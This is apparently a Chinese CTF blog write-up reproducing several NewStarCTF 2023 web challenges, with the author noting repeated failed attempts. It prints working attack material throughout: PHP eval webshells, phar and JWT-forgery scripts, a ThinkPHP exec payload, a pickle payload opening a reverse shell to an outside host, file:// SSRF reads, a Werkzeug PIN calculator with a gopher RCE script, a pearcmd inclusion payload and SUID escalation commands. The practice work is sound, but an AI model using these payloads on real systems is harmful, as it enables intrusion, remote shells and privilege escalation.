Unserialize Again
f12告诉了我们cookie, 查看一下,可以发现 pairing.php
<?phphighlight_file(__FILE__);error_reporting(0);class story{private $user='admin';public $pass;public $eating;public $God='false';public function __wakeup(){$this->user='human';if(1==1){die();}if(1!=1){echo $fffflag;}}public function __construct(){$this->user='AshenOne';$this->eating='fire';die();}public function __tostring(){return $this->user.$this->pass;}public function __invoke(){if($this->user=='admin'&&$this->pass=='admin'){echo $nothing;}}public function __destruct(){if($this->God=='true'&&$this->user=='admin'){system($this->eating);}else{die('Get Out!');}}}if(isset($_GET['pear'])&&isset($_GET['apple'])){// $Eden=new story();$pear=$_GET['pear'];$Adam=$_GET['apple'];$file=file_get_contents('php://input');file_put_contents($pear,urldecode($file));file_exists($Adam);}else{echo '多吃雪梨';} 多吃雪梨
法一:(非预期)
不管前面的反序列化,直接利用 php://input ,猜测路径为var/www/html
GET: ?pear=/var/www/html/1.php&apple=1
POST: <?php eval($_POST['cmd']);?> urlencode一下
可以发现可以访问1.php ,
但是 cmd=phpinfo(); 却没有反应,啥也没有,不知道为啥,看别人的博客应该是可以的
尝试尝试传一个 1.txt, 里面的内容也可以显示出来啊
不晓得为啥1.php就是无法执行命令, 蚁剑也连不上,可能哪里出问题了 哎,太菜了
法二:
phar反序列化, file_exists()参数可控, 配合phar://伪协议 进行反序列化
需要利用的
生成phar文件:
<?phpclass story{public $God='true';public $eating='ls /';}$phar=new Phar('1.phar');$phar->startBuffering();$phar->setStub('<?php __HALT_COMPILER(); ?>');$a=new story();$phar->setMetadata($a);$phar->addFromString('1.txt','test');$phar->stopBuffering();
需要绕过
__wakeup() 在记事本中打开生成的phar文件,修改一下相关的数字,改大一点
因为文件的内容改了,所以签名也需要换一个
相关的脚本
from hashlib import sha256with open("1.phar", 'rb') as file:f = file.read()s = f[:-40]h = f[-8:]newf = s + sha256(s).digest() + hwith open('newtest.phar', 'wb') as file:file.write(newf)
利用python直接传
import urllib.parseimport requestsurl='http://ba0133bd-772b-45c9-bcb2-3dbf95a23a5d.node5.buuoj.cn:81/pairing.php'params={'pear':'1.phar','apple':'phar://1.phar'}with open('newtest.phar','rb') as f:f=f.read()data=urllib.parse.quote(f)# print(data)res=requests.post(url=url,data=data,params=params)# print(res.text)
没有成功,
想着直接将urlencode 后的数据直接放在浏览器POST里面传参,但也没成功,
bp抓包传, 也没成功, 真有点不理解了,已经懵了
流程应该是这么个流程, 也不晓得中间哪个过程搞错了还是咋的, 一直弄不了
先放这里吧, 哎!
Final
thinkphp的版本漏洞,先搜一下5.0的漏洞
网上搜到的一个, 但是用不了,可能具体的版本不一样,尝试使它报错,得到具体的版本情况
随便仿照写一个 /index.php?s=1
可以发现具体的版本,再搜索一下
https://www.cnblogs.com/--kisaragi--/p/15315131.html
要利用的漏洞点
可以看到执行了 phpinfo 函数
但是这里禁用了system函数,
离谱了,之前都还行,现在环境又不行了 , 一样的参数, 我真服了, 重启也不行
后面应该就是写马了 ,因为被禁用了system函数, 利用exec函数进行写马, 然后蚁剑连接
_method=__construct&filter[]=exec&method=get&server[REQUEST_METHOD]=echo '<?php eval($_POST['cmd']);?>' > /var/www/public/1.php
不过最后还需要suid提权, 使用这个命令寻找相关具有suid权限的命令
find / -user root -perm -4000 -print 2>/dev/nul
附上别人的几张张图, 可以用cp命令
**
/dev/stdout
**:标准输出
直接将具有flag内容的文件复制到终端输出
流程应该是这么个流程, 环境可能有点问题, 没有复现出来
Ye's Pickle
app.py
# -*- coding: utf-8 -*-import base64import stringimport randomfrom flask import *import jwcrypto.jwk as jwkimport picklefrom python_jwt import *app = Flask(__name__)def generate_random_string(length=16):characters = string.ascii_letters + string.digits # 包含字母和数字random_string = ''.join(random.choice(characters) for _ in range(length))return random_stringapp.config['SECRET_KEY'] = generate_random_string(16)key = jwk.JWK.generate(kty='RSA', size=2048)@app.route("/")def index():payload=request.args.get("token")if payload:token=verify_jwt(payload, key, ['PS256'])session["role"]=token[1]['role']return render_template('index.html')else:session["role"]="guest"user={"username":"boogipop","role":"guest"}jwt = generate_jwt(user, key, 'PS256', timedelta(minutes=60))return render_template('index.html',token=jwt)@app.route("/pickle")def unser():if session["role"]=="admin":pickle.loads(base64.b64decode(request.args.get("pickle")))return render_template("index.html")else:return render_template("index.html")if __name__ == "__main__":app.run(host="0.0.0.0", port=5000, debug=True)
需要伪造jwt
使得 session['role']=='admin'
这个伪造的有点懵, 有点没怎么理解
import base64from datetime import timedeltafrom json import loads, dumpsfrom jwcrypto.common import base64url_decode, base64url_encodedef topic(topic):""" Use mix of JSON and compact format to insert forged claims including long expiration """[header, payload, signature] = topic.split('.')parsed_payload = loads(base64url_decode(payload))parsed_payload['role'] = 'admin'fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'originaltoken ='eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjA1OTk4OTAsImlhdCI6MTcyMDU5NjI5MCwianRpIjoiOGNmaV9BRWRsY3ViM1hsajJ5M0MwdyIsIm5iZiI6MTcyMDU5NjI5MCwicm9sZSI6Imd1ZXN0IiwidXNlcm5hbWUiOiJib29naXBvcCJ9.Jkr3-2vXnQIpAtpuxHbvgcK0z2vFa-LOanqQLOtGutNH_5aeORAw6yryHUvvFFckzaTAoIakk0s-90RtnSJdYozK0LgJr64drolvvuqKtpjuaaLTT4yIXR63VcjMuGdCl3jLioUpnVOgq_v_JIyZ4OA9uRaUnGzCiX8Q-CJKPu9AAMNFFlBCsbTVS2iEqOj2SGap4jlfSSJVQpd4syJREQCOE2RfYFwLRZ9S6IzkUH_wJbRnxrKi7uCGUimIp4oC2qmnqp8CvhoLQVKHtDL6OmSRetIqI_YVh7z8WNjMshZvJzjMNB4ZyMrpW5NNJ7IHNqzaE_2InvtzUJGxFuSAjA'topic = topic(originaltoken)print(topic)
?token=得到的结果
然后再进入 /pickle路由 进行pickle反序列化
import base64opcode=b'''cossystem(S"bash -c 'bash -i >& /dev/tcp/f57819674z.imdo.co/54789 0>&1'"tR.'''print(base64.b64encode(opcode))
看了一下session已经是admin了啊,
但用自己的服务器总是没能反弹shell成功, 一直连不上
又没能复现成功,不过多了解了一下jwt的伪造 和 pickle反序列化也还行
pickle反序列化初探 - 先知社区
pppython?
<?phpif ($_REQUEST['hint'] == ["your?", "mine!", "hint!!"]){header("Content-type: text/plain");system("ls / -la");exit();}try {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);curl_setopt($ch, CURLOPT_HTTPHEADER, $_REQUEST['lolita']);$output = curl_exec($ch);echo $output;curl_close($ch);}catch (Error $x){highlight_file(__FILE__);highlight_string($x->getMessage());}?>
根据要求传参 :?hint[0]=your?&hint[1]=mine!&hint[2]=hint!!
可以执行命令 ls / -la 列出目录及权限
注意lolita需要传参一个数组
前面所列出来的目录里面有个 app.py文件 尝试读取
ssrf漏洞 , 利用file://协议读取文件
from flask import Flask, request, session, render_template, render_template_stringimport os, base64#from NeepuF1Le import neepu_filesapp = Flask(__name__)app.config['SECRET_KEY'] = '******'@app.route('/')def welcome():if session["islogin"] == True:return "flag{***********************}"app.run('0.0.0.0', 1314, debug=True)1
想着伪造session得到flag, 但好像伪造不了
又可以看到开启了debug, 可以计算pin值 ,进入到 /console 里面
依旧是利用file://协议 去读取所需要的文件
首先用户名 : root (前面执行的 ls 那块的命令可以猜测出)
modname 一般默认为 flask.app
appname 一般默认为 flask
app.py的绝对路径一般是通过报错得到,但这里好像无法得到
通过进入到debug里面得到 : /usr/local/lib/python3.10/dist-packages/flask/app.py
?url=file:///sys/class/net/eth0/address&lolita[]=
网卡的mac地址:(转十进制)
709723444170211
machine-id是由两个值拼接的:
?url=file:///proc/sys/kernel/random/boot_id&lolita[]=
aac85635-508f-4b5b-be84-c1a02d61f9f7
?url=file:///proc/self/cgroup&lolita[]=
cri-containerd-6c00d510dbe08bb97a736ca2f55e2d44366e57395f8ac2c1f212517883888c02.scope
题目应该出了点问题吧, 理论上不是应该是有个docker啥的啊
比如别人读取的文件, 应该是要有个docker然后再是后面的数字啊, 有点懵,感觉应该是环境变了
然后就是根据得到的信息计算pin值
直接拿别人的,改一下里面相应的值就行
import hashlibfrom itertools import chainimport timeprobably_public_bits = ['root''flask.app','Flask','/usr/local/lib/python3.10/site-packages/flask/app.py']private_bits = ['709723444170211','aac85635-508f-4b5b-be84-c1a02d61f9f7cri-containerd-6c00d510dbe08bb97a736ca2f55e2d44366e57395f8ac2c1f212517883888c02.scope''8cab9c97-85be-4fb4-9d17-29335d7b2b8adocker-de0acd954e28d766468f4c4108e32529318e5e4048153309680469d179d6ceac.scope']h = hashlib.sha1()for bit in chain(probably_public_bits, private_bits):if not bit:continueif isinstance(bit, str):bit = bit.encode('utf-8')h.update(bit)h.update(b'cookiesalt')cookie_name = '__wzd' + h.hexdigest()[:20]num = Noneif num is None:h.update(b'pinsalt')num = ('%09d' % int(h.hexdigest(), 16))[:9]rv = Noneif rv is None:for group_size in 5, 4, 3:if len(num) % group_size == 0:rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')for x in range(0, len(num), group_size))breakelse:rv = numprint(rv)def hash_pin(pin: str) -> str:return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]print(cookie_name + "=" + f"{int(time.time())}|{hash_pin(rv)}")
后面的一些步骤就有点看不懂了,唉, 又没能复现出来
看这篇文章
NewStarCTF 2023 公开赛道 Web_[newstarctf 2023 公开赛道]genshin-CSDN博客
frm的值为0, 因为没有报错
访问一下console,获取s值
?url=http://localhost:1314/console&lolita[]=
s=Khhv9IfiCVDYPR2GvauW
得用gopher协议来打,实现rce,脚本:
import urllib.parseimport urllib.requestcmd = 'whoami's = "KsDz7oqmCrFx5nOp8vKz"host = "127.0.0.1:1314"# cookie = "__wzddde03e10368497982792=1698651626|c9f35062072d"pin = "113-575-700"poc = f"""GET http://127.0.0.1:1314/console?&__debugger__=yes&pin={pin}&cmd={cmd}&frm=0&s={s} HTTP/1.1Host: {host}Connection: close"""new_poc = urllib.parse.quote(poc).replace('%0A', '%0D%0A')res = f'gopher://{host}/_' + new_pocprint(urllib.parse.quote(res))
4-复盘
<?phpif (isset($_GET['page'])) {$page ='pages/' .$_GET['page'].'.php';}else{$page = 'pages/dashboard.php';}if (file_exists($page)) {require_once $page;}else{require_once 'pages/error_page.php';}?>
可以文件包含, 利用 pearcmd.php本地文件包含 写shell
payload:(套路格式)
?+config-create+/&page=../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST['cmd']);?>+1.php
蚁剑连接之后会发现无法读取flag, 权限不够, 需要suid提权
使用gzip命令提权
gzip -f /flag -t
可以得到flag
NewStarCTF 2023 公开赛道 Web_[newstarctf 2023 公开赛道]genshin-CSDN博客
https://www.cnblogs.com/EddieMurphy-blogs/p/17813704.html
NewStarCtf 2023 week3&week4&week5 web部分题目复现_newstarctf include 馃崘-CSDN博客
[NewStarCTF 2023] web题解_ctf web题 发现多个公司员工email-CSDN博客
版权归原作者 pwfortune 所有, 如有侵权,请联系我们删除。